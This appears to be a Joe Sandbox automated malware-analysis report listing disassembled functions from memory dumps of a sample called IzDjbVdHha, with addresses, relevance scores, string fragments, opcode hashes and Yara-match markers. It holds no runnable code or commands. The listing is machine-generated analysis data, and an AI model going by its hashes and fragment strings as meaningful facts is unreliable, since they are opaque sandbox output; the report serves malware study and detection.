Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: XG$|}
API String ID: 0-1014376750
Opcode ID: dab4d877ca047d4bef4a60ac035a74c1689232e455a040bcd58bfaed14168dbd
Instruction ID: 5efc56a50704edee4090976a67b7bbe675b81f8cf6387abd0fb8432c9ea2fe35
Opcode Fuzzy Hash: dab4d877ca047d4bef4a60ac035a74c1689232e455a040bcd58bfaed14168dbd
Instruction Fuzzy Hash: 28D101B15083448BD724CF18D892BABB7F1EFD2354F09891CE5968F3A1E7799801CB52

Function 00404320 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 0040439B
IEND, xrefs: 00404711

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: a91b974ffb7970066f5ddd55fbf8d6bd18980178a5d0d12c0270eeeb14f23bc6
Instruction ID: dbf6d47144c6b822b2acdb98883b9d528113f132bac91ec627b85730d464e823
Opcode Fuzzy Hash: a91b974ffb7970066f5ddd55fbf8d6bd18980178a5d0d12c0270eeeb14f23bc6
Instruction Fuzzy Hash: 34D1CEB15083449FE720CF14D84575FBBE4AB94308F14492EFA99AB3C2E779D908CB96

Function 009E4587 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 009E4602
IEND, xrefs: 009E4978

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: e75c78a806b7862965fdc8e28a2ab248e9bd6dbcacf7bf91078409fb9652b6c0
Instruction ID: c216eecbe0302122a4a6f070eb7605fd5b8b035428147111466ea3bb32bfe404
Opcode Fuzzy Hash: e75c78a806b7862965fdc8e28a2ab248e9bd6dbcacf7bf91078409fb9652b6c0
Instruction Fuzzy Hash: 84D19CB19083849FDB21CF19C841B5BBBE4AF94704F14892DF9999B382E775DD08CB92

Function 004179C1 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

r}A, xrefs: 00417D60
i, xrefs: 00417B2A

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: InitializeThunk
String ID: i$r}A
API String ID: 2994545307-2976846027
Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA

Function 0042A33F Relevance: 2.7, Strings: 2, Instructions: 211COMMON

Download Yara Rule

Strings

d, xrefs: 0042A047
d, xrefs: 0042A10D

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: d$d
API String ID: 0-195624457
Opcode ID: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
Instruction ID: a6a5a8ac2d59b7de1a8b575b3a10bb681eff341670204cea3f60d1849e0cf04e
Opcode Fuzzy Hash: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
Instruction Fuzzy Hash: F1513A36908320CBC714CF24D85162BB7D2AB8A718F494A6DECC9A7351D7369D15CB8B

Function 00418591 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

P<?, xrefs: 00418680
P<?, xrefs: 00418590

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: P<?$P<?
API String ID: 0-3449142988
Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B

Function 0043B1D0 Relevance: 1.9, Strings: 1, Instructions: 653COMMON

Download Yara Rule

Strings

f, xrefs: 0043B3F1

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A

Function 0043D880 Relevance: 1.9, Strings: 1, Instructions: 641COMMON

Download Yara Rule

Strings

bC, xrefs: 0043DFE5

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: bC
API String ID: 0-3681614764
Opcode ID: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
Instruction ID: 871c5afb2dffc20ff0dbbcf53a0195aac73061a90b0e28cef4dba4d31fdaf636
Opcode Fuzzy Hash: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
Instruction Fuzzy Hash: 3712E23AA18215CFCB04CF28E8905AAB7B2FF8E311F1A847DD54697351D734A952CB88

Function 0043D980 Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

bC, xrefs: 0043DFE5

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: bC
API String ID: 0-3681614764
Opcode ID: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
Instruction ID: 5e30844967bebdc7bd1579877bde578fcf76ae60555b00215fe6639be0914efa
Opcode Fuzzy Hash: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
Instruction Fuzzy Hash: 7DF1E436A28215CFCB04CF28E8905AAB7F2FF8E311F19847DD94697351D734A952CB88

Function 0043D999 Relevance: 1.8, Strings: 1, Instructions: 522COMMON

Download Yara Rule

Strings

bC, xrefs: 0043DFE5

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: bC
API String ID: 0-3681614764
Opcode ID: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
Instruction ID: 5e6aaad999615e2ac42fefb03cf1b536ced96fd12a8bf48793a25e995ad5db17
Opcode Fuzzy Hash: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
Instruction Fuzzy Hash: BAF1E536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88

Function 0043D997 Relevance: 1.8, Strings: 1, Instructions: 521COMMON

Download Yara Rule

Strings

bC, xrefs: 0043DFE5

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: bC
API String ID: 0-3681614764
Opcode ID: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
Instruction ID: a5988ab96186a7325d1362fbcccc642df08cbf2eaa279a3d6103cdc8c7b46e1e
Opcode Fuzzy Hash: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
Instruction Fuzzy Hash: B7F1F536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88

Function 00438F59 Relevance: 1.7, Strings: 1, Instructions: 496COMMON

Download Yara Rule

Strings

jk, xrefs: 0043938C

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: jk
API String ID: 0-78326018
Opcode ID: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
Instruction ID: 68e7885be5d05e4a2cf040f704cbb8fa7a41bea7ef2f0d8a510bf149587bd7f9
Opcode Fuzzy Hash: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
Instruction Fuzzy Hash: DDE1033A618356CBC7188F38DC5126B73E2FF4A351F0AC87DE9818B2A0E779C9558754

Function 0043DA80 Relevance: 1.7, Strings: 1, Instructions: 460COMMON

Download Yara Rule

Strings

bC, xrefs: 0043DFE5

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: bC
API String ID: 0-3681614764
Opcode ID: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
Instruction ID: 2fa55bda5e41fd724e566356672d144f9f42af162050902131bcbf15531586af
Opcode Fuzzy Hash: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
Instruction Fuzzy Hash: E9E1C376A28215CFCB08CF28E8905AAB7F2FF8E310F19857DD94697351D734A952CB84

Function 00425E30 Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

{}, xrefs: 00425F9D

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: {}
API String ID: 0-4269290415
Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A

Function 0042AC90 Relevance: 1.7, Strings: 1, Instructions: 430COMMON

Download Yara Rule

Strings

", xrefs: 0042AF88

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
Instruction ID: ccf2f4e9833933b2009195e793b8faf6d5d6e2cba860aec0098ae2c38f35b308
Opcode Fuzzy Hash: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
Instruction Fuzzy Hash: FDD11F72B083255FC714CE25A89076BB7DAAF84350F89892EECA987381D738DD15C7C6

Function 00438810 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

/,-, xrefs: 004388F5

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: InitializeThunk
String ID: /,-
API String ID: 2994545307-1700940157
Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A

Function 00A18A77 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

/,-, xrefs: 00A18B5C

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: /,-
API String ID: 0-1700940157
Opcode ID: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
Instruction ID: 038eff5a201c588ba4bc92baf69502359e24f6e39255f8e40593ce0739347fce
Opcode Fuzzy Hash: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
Instruction Fuzzy Hash: 06B18970B0D3404BD724CF24D881ABFB7A2EBD2724F19892CE49557291DB39EC86C796

Function 00416263 Relevance: 1.7, Strings: 1, Instructions: 405COMMON

Download Yara Rule

Strings

VtA, xrefs: 004163A1

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: InitializeThunk
String ID: VtA
API String ID: 2994545307-3724035812
Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A

Function 0043DB60 Relevance: 1.6, Strings: 1, Instructions: 397COMMON

Download Yara Rule

Strings

bC, xrefs: 0043DFE5

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: bC
API String ID: 0-3681614764
Opcode ID: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
Instruction ID: 4d20f92c875f40788edf4275f174b054e137e174bc84352c0492b1430194fbac
Opcode Fuzzy Hash: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
Instruction Fuzzy Hash: F3C1C176A28215CFCB08CF68E8905AAB7F2FF8E310F19897DD54597351C734A952CB84

Function 004252DD Relevance: 1.6, Strings: 1, Instructions: 346COMMON

Download Yara Rule

Strings

9YB, xrefs: 00425933

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: 9YB
API String ID: 0-659603884
Opcode ID: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
Instruction ID: 1cfe0ac6ad2819008f92b10fbbf01a1b5c50993105dc128c753fe97305f097ae
Opcode Fuzzy Hash: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
Instruction Fuzzy Hash: 80B1077AA00215CBDB18CFA9D8916BFB7B2FF89310F58816DD442AB355DB395C42CB84

Function 00408330 Relevance: 1.5, Strings: 1, Instructions: 291COMMON

Download Yara Rule

Strings

., xrefs: 00408389

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
Instruction ID: 2823e07fbbb50db066b2c442ced4ae8f01fbddd957871d70742adaa2677f6ced
Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
Instruction Fuzzy Hash: FE912A71E082524BC721CE29CA8025BB7E5AB81350F198A7ED8D5E73D1EA39DD414BC5

Function 009E8597 Relevance: 1.5, Strings: 1, Instructions: 291COMMON

Download Yara Rule

Strings

., xrefs: 009E85F0

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
Instruction ID: bcec09a323eaab0b764f3905c210ed81f2b36427a5357f26f9630cbc91efce71
Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
Instruction Fuzzy Hash: 66913D71E043924BC712CE6EC88025BB7E9AB81750F588A69E8DDD7391EE35DD418BC1

Function 00430940 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

0, xrefs: 004309C1

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
Instruction ID: 9f054d13e7867a4d77ca7132c07c00ca598ea50f9319f8eda39875565fe9693e
Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
Instruction Fuzzy Hash: AD914827759A8007D31C9E3D5C622A7BA834BEB330F2DD37EA5B1CB3E5D56888064359

Function 00A10BA7 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

0, xrefs: 00A10C28

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
Instruction ID: bfdd3bcc09be8a5060148d26130c9fa89faa84c6601905f399a84a78118ad0af
Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
Instruction Fuzzy Hash: 22915737759A800BC31C9E3D1C622A7BA934BD7330B2DC77DA9B1CB3E5D5A488854394

Function 00405EE0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 00406016

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
Instruction ID: 72525c85f477075dffe7e14f80d8e4d34094ebf61648e765f9981e94dfd3314a
Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
Instruction Fuzzy Hash: 88B137711087859FC321DF18C88061BFBE0AFA9704F444A2EF5D997782D675E918CB67

Function 009E6147 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 009E627D

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
Instruction ID: 1dbd74f99cd5c90dd02180c1133045c1a37bafb1aad5a7ff3fc34df577f35945
Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
Instruction Fuzzy Hash: A6B1277120C3819FC325CF59C98061BFBE0AFA9704F444E2DE5D997782D635EA18CBA6

Function 009F7806 Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfff, xrefs: 009F79AE

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: 04eae5f35bf542833f546afa72f4753c6069cb9a74afe6c9c0fa956fc9adcb4f
Instruction ID: 44612f1a50ca9f4ce657beaffb864c9fb1bf02568e3e90824aebb2a8c19a1586
Opcode Fuzzy Hash: 04eae5f35bf542833f546afa72f4753c6069cb9a74afe6c9c0fa956fc9adcb4f
Instruction Fuzzy Hash: E4718672A082458BD328CF68CC95BBBBBD6EBC5304F19C53DD581CB2A5DB789906C781

Function 0042B170 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042B36E

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA

Function 00A0B3D7 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 00A0B5D5

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: bd949dc42f9669ebd38e9f19ead56a993b28cdf333d927cabcf48e82c438eb73
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 3D714932A283194BD714CF2DEA8032EB7E2ABC5710F29C56DE4949B3D1D336DD458B62

Function 0041D83A Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

klm, xrefs: 0041D9AC

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: klm
API String ID: 0-3800403225
Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A

Function 009FDAB8 Relevance: 1.4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

klm, xrefs: 009FDC13

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: klm
API String ID: 0-3800403225
Opcode ID: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
Instruction ID: 104199fc51eaf6d1443e1d5b2fe053eed8d5c030b4d4cd0e583a458fa1593958
Opcode Fuzzy Hash: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
Instruction Fuzzy Hash: 755101B46093548BD714DF24C45273BBBF2EFA6308F18896CE5D68B290E7398901CB1A

Function 004288CB Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

pF, xrefs: 004289C2

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

